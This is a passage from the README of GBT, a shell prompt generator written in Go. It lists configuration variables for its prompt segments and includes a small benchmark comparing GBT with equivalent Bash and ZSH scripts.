Text content of the `{{ StatusUntrackedSymbol }}` element.\n\n- `GBT_CAR_GIT_STATUS_UNTRACKED_COUNT_BG`\n\n Background color of the `{{ StatusUntrackedCount }}` element.\n\n- `GBT_CAR_GIT_STATUS_UNTRACKED_COUNT_FG`\n\n Foreground color of the `{{ StatusUntrackedCount }}` element.\n\n- `GBT_CAR_GIT_STATUS_UNTRACKED_COUNT_FM`\n\n Formatting of the `{{ StatusUntrackedSymbol }}` element.\n\n- `GBT_CAR_GIT_STATUS_UNTRACKED_COUNT_TEXT`\n\n Text content of the `{{ StatusUntrackedCount }}` element. By default it\n contains a number of untracked files.\n\n- `GBT_CAR_GIT_AHEAD_BG`\n\n Background color of the `{{ Ahead }}` element.\n\n- `GBT_CAR_GIT_AHEAD_FG`\n\n Foreground color of the `{{ Ahead }}` element.\n\n- `GBT_CAR_GIT_AHEAD_FM`\n\n Formatting of the `{{ Ahead }}` element.\n\n- `GBT_CAR_GIT_AHEAD_FORMAT='{{ AheadSymbol }}'`\n\n Format of the the `{{ Ahead }}` element. It can be `{{ AheadSymbol }}` or\n `{{ AheadCount }}`.\n\n- `GBT_CAR_GIT_AHEAD_SYMBOL_BG`\n\n Background color of the `{{ AheadSymbol }}` element.\n\n- `GBT_CAR_GIT_AHEAD_SYMBOL_FG`\n\n Foreground color of the `{{ AheadSymbol }}` element.\n\n- `GBT_CAR_GIT_AHEAD_SYMBOL_FM`\n\n Formatting of the `{{ AheadSymbol }}` element.\n\n- `GBT_CAR_GIT_AHEAD_SYMBOL_TEXT=' \u2b06'`\n\n Text content of the `{{ AheadSymbol }}` element.\n\n- `GBT_CAR_GIT_AHEAD_COUNT_BG`\n\n Background color of the `{{ AheadCount }}` element.\n\n- `GBT_CAR_GIT_AHEAD_COUNT_FG`\n\n Foreground color of the `{{ AheadCount }}` element.\n\n- `GBT_CAR_GIT_AHEAD_COUNT_FM`\n\n Formatting of the `{{ AheadSymbol }}` element.\n\n- `GBT_CAR_GIT_AHEAD_COUNT_TEXT`\n\n Text content of the `{{ AheadCount }}` element. By default it contains\n a number of commits ahead of the remote branch.\n\n- `GBT_CAR_GIT_BEHIND_BG`\n\n Background color of the `{{ Behind }}` element.\n\n- `GBT_CAR_GIT_BEHIND_FG`\n\n Foreground color of the `{{ Behind }}` element.\n\n- `GBT_CAR_GIT_BEHIND_FM`\n\n Formatting of the `{{ Behind }}` element.\n\n- `GBT_CAR_GIT_BEHIND_FORMAT='{{ BehindSymbol }}'`\n\n Format of the the `{{ Behind }}` element. It can be `{{ BehindSymbol }}` or\n `{{ BehindCount }}`.\n\n- `GBT_CAR_GIT_BEHIND_SYMBOL_BG`\n\n Background color of the `{{ BehindSymbol }}` element.\n\n- `GBT_CAR_GIT_BEHIND_SYMBOL_FG`\n\n Foreground color of the `{{ BehindSymbol }}` element.\n\n- `GBT_CAR_GIT_BEHIND_SYMBOL_FM`\n\n Formatting of the `{{ BehindSymbol }}` element.\n\n- `GBT_CAR_GIT_BEHIND_SYMBOL_TEXT=' \u2b07'`\n\n Text content of the `{{ BehindSymbol }}` element.\n\n- `GBT_CAR_GIT_BEHIND_COUNT_BG`\n\n Background color of the `{{ BehindCount }}` element.\n\n- `GBT_CAR_GIT_BEHIND_COUNT_FG`\n\n Foreground color of the `{{ BehindCount }}` element.\n\n- `GBT_CAR_GIT_BEHIND_COUNT_FM`\n\n Formatting of the `{{ BehindSymbol }}` element.\n\n- `GBT_CAR_GIT_BEHIND_COUNT_TEXT`\n\n Text content of the `{{ BehindCount }}` element. By default it contains\n a number of commits ahead of the remote branch.\n\n- `GBT_CAR_GIT_STASH_BG`\n\n Background color of the `{{ Stash }}` element.\n\n- `GBT_CAR_GIT_STASH_FG`\n\n Foreground color of the `{{ Stash }}` element.\n\n- `GBT_CAR_GIT_STASH_FM`\n\n Formatting of the `{{ Stash }}` element.\n\n- `GBT_CAR_GIT_STASH_FORMAT='{{ StashSymbol }}'`\n\n Format of the the `{{ Stash }}` element. It can be `{{ StashSymbol }}` or\n `{{ StashCount }}`.\n\n- `GBT_CAR_GIT_STASH_SYMBOL_BG`\n\n Background color of the `{{ StashSymbol }}` element.\n\n- `GBT_CAR_GIT_STASH_SYMBOL_FG`\n\n Foreground color of the `{{ StashSymbol }}` element.\n\n- `GBT_CAR_GIT_STASH_SYMBOL_FM`\n\n Formatting of the `{{ StashSymbol }}` element.\n\n- `GBT_CAR_GIT_STASH_SYMBOL_TEXT=' \u2691'`\n\n Text content of the `{{ StashSymbol }}` element.\n\n- `GBT_CAR_GIT_STASH_COUNT_BG`\n\n Background color of the `{{ StashCount }}` element.\n\n- `GBT_CAR_GIT_STASH_COUNT_FG`\n\n Foreground color of the `{{ StashCount }}` element.\n\n- `GBT_CAR_GIT_STASH_COUNT_FM`\n\n Formatting of the `{{ StashSymbol }}` element.\n\n- `GBT_CAR_GIT_STASH_COUNT_TEXT`\n\n Text content of the `{{ StashCount }}` element. By default it contains\n a number of stashes.\n\n- `GBT_CAR_GIT_DISPLAY`\n\n Whether to display this car if it's in the list of cars (`GBT_CARS`).\n\n- `GBT_CAR_GIT_WRAP='0'`\n\n Whether to wrap the prompt line in front of this car.\n\n- `GBT_CAR_GIT_SEP_TEXT`\n\n Text content of the separator for this car.\n\n- `GBT_CAR_GIT_SEP_BG`\n\n Background color of the separator for this car.\n\n- `GBT_CAR_GIT_SEP_FG`\n\n Foreground color of the separator for this car.\n\n- `GBT_CAR_GIT_SEP_FM`\n\n Formatting of the separator for this car.\n\n\n#### `Hostname` car\n\nCar that displays username of the currently logged user and the hostname of the\nlocal machine.\n\n- `GBT_CAR_HOSTNAME_BG='dark_gray'`\n\n Background color of the car.\n\n- `GBT_CAR_HOSTNAME_FG='252'`\n\n Foreground color of the car.\n\n- `GBT_CAR_HOSTNAME_FM='none'`\n\n Formatting of the car.\n\n- `GBT_CAR_HOSTNAME_FORMAT=' {{ UserHost }} '`\n\n Format of the car.\n\n- `GBT_CAR_HOSTNAME_USERHOST_BG`\n\n Background color of the `{{ UserHost }}` element.\n\n- `GBT_CAR_HOSTNAME_USERHOST_FG`\n\n Foreground color of the `{{ UserHost }}` element.\n\n- `GBT_CAR_HOSTNAME_USERHOST_FM`\n\n Formatting of the `{{ UserHost }}` element.\n\n- `GBT_CAR_HOSTNAME_USERHOST_FORMAT`\n\n Format of the `{{ UserHost }}` element. The value is either\n `{{ Admin }}@{{ Host }}` if the user is `root` or `{{ User }}@{{ Host }}`\n if the user is a normal user.\n\n- `GBT_CAR_HOSTNAME_ADMIN_BG`\n\n Background color of the `{{ Admin }}` element.\n\n- `GBT_CAR_HOSTNAME_ADMIN_FG`\n\n Foreground color of the `{{ Admin }}` element.\n\n- `GBT_CAR_HOSTNAME_ADMIN_FM`\n\n Formatting of the `{{ Admin }}` element.\n\n- `GBT_CAR_HOSTNAME_ADMIN_TEXT`\n\n Text content of the `{{ Admin }}` element. The user name.\n\n- `GBT_CAR_HOSTNAME_USER_BG`\n\n Background color of the `{{ User }}` element.\n\n- `GBT_CAR_HOSTNAME_USER_FG`\n\n Foreground color of the `{{ User }}` element.\n\n- `GBT_CAR_HOSTNAME_USER_FM`\n\n Formatting of the `{{ User }}` element.\n\n- `GBT_CAR_HOSTNAME_USER_TEXT`\n\n Text content of the `{{ User }}` element. The user name.\n\n- `GBT_CAR_HOSTNAME_HOST_BG`\n\n Background color of the `{{ Host }}` element.\n\n- `GBT_CAR_HOSTNAME_HOST_FG`\n\n Foreground color of the `{{ Host }}` element.\n\n- `GBT_CAR_HOSTNAME_HOST_FM`\n\n Formatting of the `{{ Host }}` element.\n\n- `GBT_CAR_HOSTNAME_HOST_TEXT`\n\n Text content of the `{{ Host }}` element. The host name.\n\n- `GBT_CAR_HOSTNAME_DISPLAY='1'`\n\n Whether to display this car if it's in the list of cars (`GBT_CARS`).\n\n- `GBT_CAR_HOSTNAME_WRAP='0'`\n\n Whether to wrap the prompt line in front of this car.\n\n- `GBT_CAR_HOSTNAME_SEP_TEXT`\n\n Text content of the separator for this car.\n\n- `GBT_CAR_HOSTNAME_SEP_BG`\n\n Background color of the separator for this car.\n\n- `GBT_CAR_HOSTNAME_SEP_FG`\n\n Foreground color of the separator for this car.\n\n- `GBT_CAR_HOSTNAME_SEP_FM`\n\n Formatting of the separator for this car.\n\n\n#### `Kubectl` car\n\nCar that displays `kubectl` information.\n\n- `GBT_CAR_KUBECTL_BG='26'`\n\n Background color of the car.\n\n- `GBT_CAR_KUBECTL_FG='white'`\n\n Foreground color of the car.\n\n- `GBT_CAR_KUBECTL_FM='none'`\n\n Formatting of the car.\n\n- `GBT_CAR_KUBECTL_FORMAT=' {{ Icon }} {{ Context }} '`\n\n Format of the car. `{{ Cluster }}`, `{{ AuthInfo }}` and `{{ Namespace }}`\n can be used here as well.\n\n- `GBT_CAR_KUBECTL_ICON_BG`\n\n Background color of the `{{ Icon }}` element.\n\n- `GBT_CAR_KUBECTL_ICON_FG`\n\n Foreground color of the `{{ Icon }}` element.\n\n- `GBT_CAR_KUBECTL_ICON_FM`\n\n Formatting of the `{{ Icon }}` element.\n\n- `GBT_CAR_KUBECTL_ICON_TEXT='\u2388'`\n\n Text content of the `{{ Icon }}` element.\n\n- `GBT_CAR_KUBECTL_CONTEXT_BG`\n\n Background color of the `{{ Context }}` element.\n\n- `GBT_CAR_KUBECTL_CONTEXT_FG`\n\n Foreground color of the `{{ Context }}` element.\n\n- `GBT_CAR_KUBECTL_CONTEXT_FM`\n\n Formatting of the `{{ Context }}` element.\n\n- `GBT_CAR_KUBECTL_CONTEXT_TEXT`\n\n Text content of the `{{ Context }}` element.\n\n- `GBT_CAR_KUBECTL_CLUSTER_BG`\n\n Background color of the `{{ Cluster }}` element.\n\n- `GBT_CAR_KUBECTL_CLUSTER_FG`\n\n Foreground color of the `{{ Cluster }}` element.\n\n- `GBT_CAR_KUBECTL_CLUSTER_FM`\n\n Formatting of the `{{ Cluster }}` element.\n\n- `GBT_CAR_KUBECTL_CLUSTER_TEXT`\n\n Text content of the `{{ Cluster }}` element.\n\n- `GBT_CAR_KUBECTL_AUTHINFO_BG`\n\n Background color of the `{{ AuthInfo }}` element.\n\n- `GBT_CAR_KUBECTL_AUTHINFO_FG`\n\n Foreground color of the `{{ AuthInfo }}` element.\n\n- `GBT_CAR_KUBECTL_AUTHINFO_FM`\n\n Formatting of the `{{ AuthInfo }}` element.\n\n- `GBT_CAR_KUBECTL_AUTHINFO_TEXT`\n\n Text content of the `{{ AuthInfo }}` element.\n\n- `GBT_CAR_KUBECTL_NAMESPACE_BG`\n\n Background color of the `{{ Namespace }}` element.\n\n- `GBT_CAR_KUBECTL_NAMESPACE_FG`\n\n Foreground color of the `{{ Namespace }}` element.\n\n- `GBT_CAR_KUBECTL_NAMESPACE_FM`\n\n Formatting of the `{{ Namespace }}` element.\n\n- `GBT_CAR_KUBECTL_NAMESPACE_TEXT`\n\n Text content of the `{{ Namespace }}` element.\n\n- `GBT_CAR_KUBECTL_DISPLAY='1'`\n\n Whether to display this car if it's in the list of cars (`GBT_CARS`).\n\n- `GBT_CAR_KUBECTL_WRAP='0'`\n\n Whether to wrap the prompt line in front of this car.\n\n- `GBT_CAR_KUBECTL_SEP_TEXT`\n\n Text content of the separator for this car.\n\n- `GBT_CAR_KUBECTL_SEP_BG`\n\n Background color of the separator for this car.\n\n- `GBT_CAR_KUBECTL_SEP_FG`\n\n Foreground color of the separator for this car.\n\n- `GBT_CAR_KUBECTL_SEP_FM`\n\n Formatting of the separator for this car.\n\n\n#### `Os` car\n\nCar that displays icon of the operating system.\n\n- `GBT_CAR_OS_BG='235'`\n\n Background color of the car.\n\n- `GBT_CAR_OS_FG='white'`\n\n Foreground color of the car.\n\n- `GBT_CAR_OS_FM='none'`\n\n Formatting of the car.\n\n- `GBT_CAR_OS_FORMAT=' {{ Symbol }} '`\n\n Format of the car.\n\n- `GBT_CAR_OS_SYMBOL_BG`\n\n Background color of the `{{ Symbol }}` element.\n\n- `GBT_CAR_OS_SYMBOL_FG`\n\n Foreground color of the `{{ Symbol }}` element.\n\n- `GBT_CAR_OS_SYMBOL_FM`\n\n Formatting of the `{{ Symbol }}` element.\n\n- `GBT_CAR_OS_SYMBOL_TEXT`\n\n Text content of the `{{ Symbol }}` element.\n\n- `GBT_CAR_OS_NAME`\n\n The name of the symbol to display. Default value is selected by the system\n the shell runs at. Possible names and their symbols are:\n\n - `amzn` \uf270\n - `android` \uf17b\n - `arch` \uf300\n - `archarm` \uf300\n - `centos` \uf301\n - `cloud` \ue268\n - `coreos` \uf30f\n - `darwin` \ue711\n - `debian` \uf302\n - `docker` \ue7b0\n - `elementary` \uf311\n - `fedora` \uf303\n - `freebsd` \uf30e\n - `gentoo` \uf310\n - `linux` \ue712\n - `linuxmint` \uf304\n - `mageia` \uf306\n - `mandriva` \uf307\n - `opensuse` \uf308\n - `raspbian` \ue722\n - `redhat` \uf309\n - `sabayon` \uf313\n - `slackware` \uf30a\n - `ubuntu` \uf30c\n - `windows` \ue70f\n\n Example:\n\n ```shell\n export GBT_CAR_OS_NAME='arch'\n ```\n\n- `GBT_CAR_OS_DISPLAY='1'`\n\n Whether to display this car if it's in the list of cars (`GBT_CARS`).\n\n- `GBT_CAR_OS_WRAP='0'`\n\n Whether to wrap the prompt line in front of this car.\n\n- `GBT_CAR_OS_SEP_TEXT`\n\n Text content of the separator for this car.\n\n- `GBT_CAR_OS_SEP_BG`\n\n Background color of the separator for this car.\n\n- `GBT_CAR_OS_SEP_FG`\n\n Foreground color of the separator for this car.\n\n- `GBT_CAR_OS_SEP_FM`\n\n Formatting of the separator for this car.\n\n\n#### `PyVirtEnv` car\n\nCar that displays Python Virtual Environment name. This car is displayed only\nif the Python Virtual Environment is activated. The activation script usually\nprepends the shell prompt by the Virtual Environment name by default. In order\nto disable it, the following environment variable must be set:\n\n```shell\nexport VIRTUAL_ENV_DISABLE_PROMPT='1'\n```\n\nVariables used by the car:\n\n- `GBT_CAR_PYVIRTENV_BG='222'`\n\n Background color of the car.\n\n- `GBT_CAR_PYVIRTENV_FG='black'`\n\n Foreground color of the car.\n\n- `GBT_CAR_PYVIRTENV_FM='none'`\n\n Formatting of the car.\n\n- `GBT_CAR_PYVIRTENV_FORMAT=' {{ Icon }} {{ Name }} '`\n\n Format of the car.\n\n- `GBT_CAR_PYVIRTENV_ICON_BG`\n\n Background color of the `{{ Icon }}` element.\n\n- `GBT_CAR_PYVIRTENV_ICON_FG`\n\n Foreground color of the `{{ Icon }}` element.\n\n- `GBT_CAR_PYVIRTENV_ICON_FM`\n\n Formatting of the `{{ Icon }}` element.\n\n- `GBT_CAR_PYVIRTENV_ICON_TEXT`\n\n Text content of the `{{ Icon }}` element.\n\n- `GBT_CAR_PYVIRTENV_NAME_BG`\n\n Background color of the `{{ Name }}` element.\n\n- `GBT_CAR_PYVIRTENV_NAME_FG='33'`\n\n Foreground color of the `{{ NAME }}` element.\n\n- `GBT_CAR_PYVIRTENV_NAME_FM`\n\n Formatting of the `{{ Name }}` element.\n\n- `GBT_CAR_PYVIRTENV_NAME_TEXT`\n\n The name of the Python Virtual Environment deducted from the `VIRTUAL_ENV`\n environment variable.\n\n- `GBT_CAR_PYVIRTENV_DISPLAY`\n\n Whether to display this car if it's in the list of cars (`GBT_CARS`).\n\n- `GBT_CAR_PYVIRTENV_WRAP='0'`\n\n Whether to wrap the prompt line in front of this car.\n\n- `GBT_CAR_PYVIRTENV_SEP_TEXT`\n\n Text content of the separator for this car.\n\n- `GBT_CAR_PYVIRTENV_SEP_BG`\n\n Background color of the separator for this car.\n\n- `GBT_CAR_PYVIRTENV_SEP_FG`\n\n Foreground color of the separator for this car.\n\n- `GBT_CAR_PYVIRTENV_SEP_FM`\n\n Formatting of the separator for this car.\n\n\n#### `Sign` car\n\nCar that displays prompt character for the admin and user at the end of the\ntrain.\n\n- `GBT_CAR_SIGN_BG='default'`\n\n Background color of the car.\n\n- `GBT_CAR_SIGN_FG='default'`\n\n Foreground color of the car.\n\n- `GBT_CAR_SIGN_FM='none'`\n\n Formatting of the car.\n\n- `GBT_CAR_SIGN_FORMAT=' {{ Symbol }} '`\n\n Format of the car.\n\n- `GBT_CAR_SIGN_SYMBOL_BG`\n\n Background color of the `{{ Symbol }}` element.\n\n- `GBT_CAR_SIGN_SYMBOL_FG`\n\n Foreground color of the `{{ Symbol }}` element.\n\n- `GBT_CAR_SIGN_SYMBOL_FM='bold'`\n\n Formatting of the `{{ Symbol }}` element.\n\n- `GBT_CAR_SIGN_SYMBOL_FORMAT`\n\n Format of the `{{ Symbol }}` element. The format is either `{{ Admin }}` if\n the UID is 0 or `{{ User }}` if the UID is not 0.\n\n- `GBT_CAR_SIGN_ADMIN_BG`\n\n Background color of the `{{ Admin }}` element.\n\n- `GBT_CAR_SIGN_ADMIN_FG='red'`\n\n Foreground color of the `{{ Admin }}` element.\n\n- `GBT_CAR_SIGN_ADMIN_FM`\n\n Formatting of the `{{ Admin }}` element.\n\n- `GBT_CAR_SIGN_ADMIN_TEXT='#'`\n\n Text content of the `{{ Admin }}` element.\n\n- `GBT_CAR_SIGN_USER_BG`\n\n Background color of the `{{ User }}` element.\n\n- `GBT_CAR_SIGN_USER_FG='light_green'`\n\n Foreground color of the `{{ User }}` element.\n\n- `GBT_CAR_SIGN_USER_FM`\n\n Formatting of the `{{ User }}` element.\n\n- `GBT_CAR_SIGN_USER_TEXT='$'`\n\n Text content of the `{{ User }}` element. The user name.\n\n- `GBT_CAR_SIGN_DISPLAY='1'`\n\n Whether to display this car if it's in the list of cars (`GBT_CARS`).\n\n- `GBT_CAR_SIGN_WRAP='0'`\n\n Whether to wrap the prompt line in front of this car.\n\n- `GBT_CAR_SIGN_SEP_TEXT`\n\n Text content of the separator for this car.\n\n- `GBT_CAR_SIGN_SEP_BG`\n\n Background color of the separator for this car.\n\n- `GBT_CAR_SIGN_SEP_FG`\n\n Foreground color of the separator for this car.\n\n- `GBT_CAR_SIGN_SEP_FM`\n\n Formatting of the separator for this car.\n\n\n#### `Status` car\n\nCar that visualizes return code of every command. By default, this car is\ndisplayed only when the return code is non-zero. If you want to display it even\nif the return code is zero, set the following variable:\n\n```shell\nexport GBT_CAR_STATUS_DISPLAY='1'\n```\n\nVariables used by the car:\n\n- `GBT_CAR_STATUS_BG`\n\n Background color of the car. It's either `GBT_CAR_STATUS_OK_BG` if the last\n command returned `0` return code otherwise the `GBT_CAR_STATUS_ERROR_BG` is\n used.\n\n- `GBT_CAR_STATUS_FG='default'`\n\n Foreground color of the car. It's either `GBT_CAR_STATUS_OK_FG` if the last\n command returned `0` return code otherwise the `GBT_CAR_STATUS_ERROR_FG` is\n used.\n\n- `GBT_CAR_STATUS_FM='none'`\n\n Formatting of the car. It's either `GBT_CAR_STATUS_OK_FM` if the last command\n returned `0` return code otherwise the `GBT_CAR_STATUS_ERROR_FM` is used.\n\n- `GBT_CAR_STATUS_FORMAT=' {{ Symbol }} '`\n\n Format of the car. This can be changed to contain also the value of the\n return code:\n\n ```shell\n export GBT_CAR_STATUS_FORMAT=' {{ Symbol }} {{ Code }} '\n ```\n\n or the signal name of the return code:\n\n ```shell\n export GBT_CAR_STATUS_FORMAT=' {{ Symbol }} {{ Signal }} '\n ```\n\n If you want to display the Status train even if there is no error, you have\n to use the `{{ Details }}` element to prevent the `{{ Code }}` and/or\n `{{ Signal }}` from being displayed:\n\n ```shell\n export GBT_CAR_STATUS_DISPLAY=1\n export GBT_CAR_STATUS_FORMAT=' {{ Symbol }}{{ Details }} '\n ```\n\n Then you can modify the format of the `{{ Details }}` element like this for\n when there is an error:\n\n ```shell\n export GBT_CAR_STATUS_DETAILS_FORMAT=' {{ Code }} {{ Signal }}'\n ```\n\n- `GBT_CAR_STATUS_SYMBOL_BG`\n\n Background color of the `{{ Symbol }}` element.\n\n- `GBT_CAR_STATUS_SYMBOL_FG`\n\n Foreground color of the `{{ Symbol }}` element.\n\n- `GBT_CAR_STATUS_SYMBOL_FM='bold'`\n\n Formatting of the `{{ Symbol }}` element.\n\n- `GBT_CAR_STATUS_SYMBOL_FORMAT`\n\n Format of the `{{ Symbol }}` element. The format is either `{{ Error }}` if\n the last command returned non zero return code otherwise `{{ User }}` is\n used.\n\n- `GBT_CAR_STATUS_SIGNAL_BG`\n\n Background color of the `{{ Signal }}` element.\n\n- `GBT_CAR_STATUS_SIGNAL_FG`\n\n Foreground color of the `{{ Signal }}` element.\n\n- `GBT_CAR_STATUS_SIGNAL_FM`\n\n Formatting color of the `{{ Signal }}` element.\n\n- `GBT_CAR_STATUS_SIGNAL_TEXT`\n\n Text of the `{{ Signal }}` element.\n\n- `GBT_CAR_STATUS_CODE_BG='red'`\n\n Background color of the `{{ Code }}` element.\n\n- `GBT_CAR_STATUS_CODE_FG='light_gray'`\n\n Foreground color of the `{{ Code }}` element.\n\n- `GBT_CAR_STATUS_CODE_FM='none'`\n\n Formatting of the `{{ Code }}` element.\n\n- `GBT_CAR_STATUS_CODE_TEXT`\n\n Text content of the `{{ Code }}` element. The return code.\n\n- `GBT_CAR_STATUS_ERROR_BG='red'`\n\n Background color of the `{{ Error }}` element.\n\n- `GBT_CAR_STATUS_ERROR_FG='light_gray'`\n\n Foreground color of the `{{ Error }}` element.\n\n- `GBT_CAR_STATUS_ERROR_FM='none'`\n\n Formatting of the `{{ Error }}` element.\n\n- `GBT_CAR_STATUS_ERROR_TEXT='\u2718'`\n\n Text content of the `{{ Error }}` element.\n\n- `GBT_CAR_STATUS_OK_BG='green'`\n\n Background color of the `{{ Ok }}` element.\n\n- `GBT_CAR_STATUS_OK_FG='light_gray'`\n\n Foreground color of the `{{ Ok }}` element.\n\n- `GBT_CAR_STATUS_OK_FM='none'`\n\n Formatting of the `{{ Ok }}` element.\n\n- `GBT_CAR_STATUS_OK_TEXT='\u2714'`\n\n Text content of the `{{ Ok }}` element.\n\n- `GBT_CAR_STATUS_DISPLAY`\n\n Whether to display this car if it's in the list of cars (`GBT_CARS`).\n\n- `GBT_CAR_STATUS_WRAP='0'`\n\n Whether to wrap the prompt line in front of this car.\n\n- `GBT_CAR_STATUS_SEP_TEXT`\n\n Text content of the separator for this car.\n\n- `GBT_CAR_STATUS_SEP_BG`\n\n Background color of the separator for this car.\n\n- `GBT_CAR_STATUS_SEP_FG`\n\n Foreground color of the separator for this car.\n\n- `GBT_CAR_STATUS_SEP_FM`\n\n Formatting of the separator for this car.\n\n\n#### `Time` car\n\nCar that displays current date and time.\n\n- `GBT_CAR_TIME_BG='light_blue'`\n\n Background color of the car.\n\n- `GBT_CAR_TIME_FG='light_gray'`\n\n Foreground color of the car.\n\n- `GBT_CAR_TIME_FM='none'`\n\n Formatting of the car.\n\n- `GBT_CAR_TIME_FORMAT=' {{ DateTime }} '`\n\n Format of the car.\n\n- `GBT_CAR_TIME_DATETIME_BG`\n\n Background color of the `{{ DateTime }}` element.\n\n- `GBT_CAR_TIME_DATETIME_FG`\n\n Foreground color of the `{{ DateTime }}` element.\n\n- `GBT_CAR_TIME_DATETIME_FM`\n\n Formatting of the `{{ DateTime }}` element.\n\n- `GBT_CAR_TIME_DATETIME_FORMAT='{{ Date }} {{ Time }}'`\n\n Format of the `{{ DateTime }}` element.\n\n- `GBT_CAR_TIME_DATE_BG`\n\n Background color of the `{{ Date }}` element.\n\n- `GBT_CAR_TIME_DATE_FG`\n\n Foreground color of the `{{ Date }}` element.\n\n- `GBT_CAR_TIME_DATE_FM`\n\n Formatting of the `{{ Date }}` element.\n\n- `GBT_CAR_TIME_DATE_FORMAT='Mon 02 Jan'`\n\n Format of the `{{ Date }}` element. The format is using placeholders as\n described in the [`time.Format()`](https://golang.org/src/time/format.go#L87)\n Go function. For example `January` is a placeholder for current full month\n name and `PM` is a placeholder `AM` if the current time is before noon or\n `PM` if the current time is after noon. So in order to display date in the\n format of `YYYY-MM-DD`, the value of this variable should be `2006-01-02`.\n\n- `GBT_CAR_TIME_TIME_BG`\n\n Background color of the `{{ Host }}` element.\n\n- `GBT_CAR_TIME_TIME_FG='light_yellow'`\n\n Foreground color of the `{{ Host }}` element.\n\n- `GBT_CAR_TIME_TIME_FM`\n\n Formatting of the `{{ Host }}` element.\n\n- `GBT_CAR_TIME_TIME_FORMAT='15:04:05'`\n\n Text content of the `{{ Host }}` element. The format principles are the same\n like in the case of the `GBT_CAR_TIME_DATE_FORMAT` variable above. So in\n order to display time in the 12h format, the value of this variable should be\n `03:04:05 PM`.\n\n- `GBT_CAR_TIME_DISPLAY='1'`\n\n Whether to display this car if it's in the list of cars (`GBT_CARS`).\n\n- `GBT_CAR_TIME_WRAP='0'`\n\n Whether to wrap the prompt line in front of this car.\n\n- `GBT_CAR_TIME_SEP_TEXT`\n\n Text content of the separator for this car.\n\n- `GBT_CAR_TIME_SEP_BG`\n\n Background color of the separator for this car.\n\n- `GBT_CAR_TIME_SEP_FG`\n\n Foreground color of the separator for this car.\n\n- `GBT_CAR_TIME_SEP_FM`\n\n Formatting of the separator for this car.\n\n\nBenchmark\n---------\n\nBenchmark of GBT can be done by faking the output of GBT by a testing script\nwhich executes as minimum of commands as possible. For simplicity, the test will\nproduce output of the Git car only and will be done from within a directory with\na Git repository.\n\nThe testing script is using exactly the same commands like GBT to determine the\nGit branch, whether the Git repository contains any change and whether it's\nahead/behind of the remote branch. The script has the following content and is\nstored in `/tmp/test.sh`:\n\n```shell\nBRANCH=\"$(git symbolic-ref HEAD)\"\n[ -z \"$(git status --porcelain)\" ] && DIRTY_ICON='%{\\e[38;5;2m%}\u2714' || DIRTY_ICON='%{\\e[38;5;1m%}\u2718'\n[[ \"$(git rev-list --count HEAD..@{upstream})\" == '0' ]] && AHEAD_ICON='' || AHEAD_ICON=' \u2b06'\n[[ \"$(git rev-list --count @{upstream}..HEAD)\" == '0' ]] && BEHIND_ICON='' || BEHIND_ICON=' \u2b07'\n\necho -en \"%{\\e[0m%}%{\\e[48;5;7m%}%{\\e[38;5;0m%} %{\\e[48;5;7m%}%{\\e[38;5;0m%}\ue0a0%{\\e[48;5;7m%}%{\\e[38;5;0m%} %{\\e[48;5;7m%}%{\\e[38;5;0m%}${BRANCH##*/}%{\\e[48;5;7m%}%{\\e[38;5;0m%} %{\\e[48;5;7m%}%{\\e[38;5;0m%}%{\\e[48;5;7m%}$DIRTY_ICON%{\\e[48;5;7m%}%{\\e[38;5;0m%}%{\\e[48;5;7m%}%{\\e[38;5;0m%}%{\\e[48;5;7m%}%{\\e[38;5;0m%}$AHEAD_ICON%{\\e[48;5;7m%}%{\\e[38;5;0m%}%{\\e[48;5;7m%}%{\\e[38;5;0m%}$BEHIND_ICON%{\\e[48;5;7m%}%{\\e[38;5;0m%} %{\\e[0m%}\"\n```\n\nThe testing script produces the same output like GBT when run by Bash or ZSH:\n\n```shell\nbash /tmp/test.sh > /tmp/a\nzsh /tmp/test.sh > /tmp/b\nGBT_SHELL='zsh' GBT_CARS='Git' gbt > /tmp/c\ndiff /tmp/{a,b}\ndiff /tmp/{b,c}\n```\n\nWe will use ZSH to run 10 measurements of 100 executions of the testing script\nby Bash and ZSH as well as of GBT itself.\n\n```shell\n# Execution of the testing script by Bash\nfor N in $(seq 10); do time (for M in $(seq 100); do bash /tmp/test.sh 1>/dev/null 2>&1; done;) done 2>&1 | sed 's/.* //'\n0.95s user 1.05s system 102% cpu 1.944 total\n0.94s user 1.06s system 102% cpu 1.944 total\n0.93s user 1.05s system 102% cpu 1.930 total\n0.91s user 1.10s system 102% cpu 1.954 total\n0.92s user 1.07s system 102% cpu 1.933 total\n0.97s user 1.03s system 102% cpu 1.943 total\n0.92s user 1.07s system 102% cpu 1.931 total\n0.92s user 1.08s system 102% cpu 1.949 total\n0.89s user 1.11s system 102% cpu 1.938 total\n0.93s user 1.07s system 102% cpu 1.944 total\n# Execution of the testing script by ZSH\nfor N in $(seq 10); do time (for M in $(seq 100); do zsh /tmp/test.sh 1>/dev/null 2>&1; done;) done 2>&1 | sed 's/.* //'\n0.89s user 1.08s system 103% cpu 1.909 total\n0.82s user 1.15s system 103% cpu 1.906 total\n0.82s user 1.15s system 103% cpu 1.903 total\n0.84s user 1.13s system 103% cpu 1.907 total\n0.88s user 1.10s system 103% cpu 1.915 total\n0.88s user 1.09s system 103% cpu 1.907 total\n0.84s user 1.14s system 103% cpu 1.919 total\n0.85s user 1.11s system 103% cpu 1.901 total\n0.89s user 1.08s system 103% cpu 1.914 total\n0.96s user 1.01s system 103% cpu 1.908 total\n# Execution of GBT\nfor N in $(seq 10); do time (for M in $(seq 100); do GBT_SHELL='zsh' GBT_CARS='Git' gbt 1>/dev/null 2>&1; done;) done 2>&1 | sed 's/.* //'\n1.03s user 1.19s system 115% cpu 1.922 total\n0.98s user 1.18s system 115% cpu 1.874 total\n1.06s user 1.11s system 115% cpu 1.880 total\n1.02s user 1.14s system 115% cpu 1.867 total\n1.04s user 1.17s system 115% cpu 1.918 total\n1.05s user 1.10s system 115% cpu 1.853 total\n1.07s user 1.11s system 115% cpu 1.895 total\n1.01s user 1.18s system 115% cpu 1.903 total\n1.08s user 1.03s system 115% cpu 1.825 total\n1.05s user 1.09s system 115% cpu 1.844 total\n```\n\nFrom the above is visible that GBT performs faster than Bash and ZSH even if the\ntesting script was as simple as possible. You can also notice that GBT was using\nmore CPU than Bash or ZSH. That's probably because of the built-in concurrency\nsupport in Go.\n\n\nPrompt forwarding\n-----------------\n\nIn order to enjoy GBT prompt via SSH but also in Docker, Kubectl, Vagrant, MySQL\nor in Screen without the need to install GBT everywhere, you can use GBTS (GBT\nwritten in Shell). GBTS is a set of scripts which get forwarded to applications\nand remote connections and then executed to generate the nice looking prompt.\n\nYou can start using it by doing the following:\n\n```shell\nexport 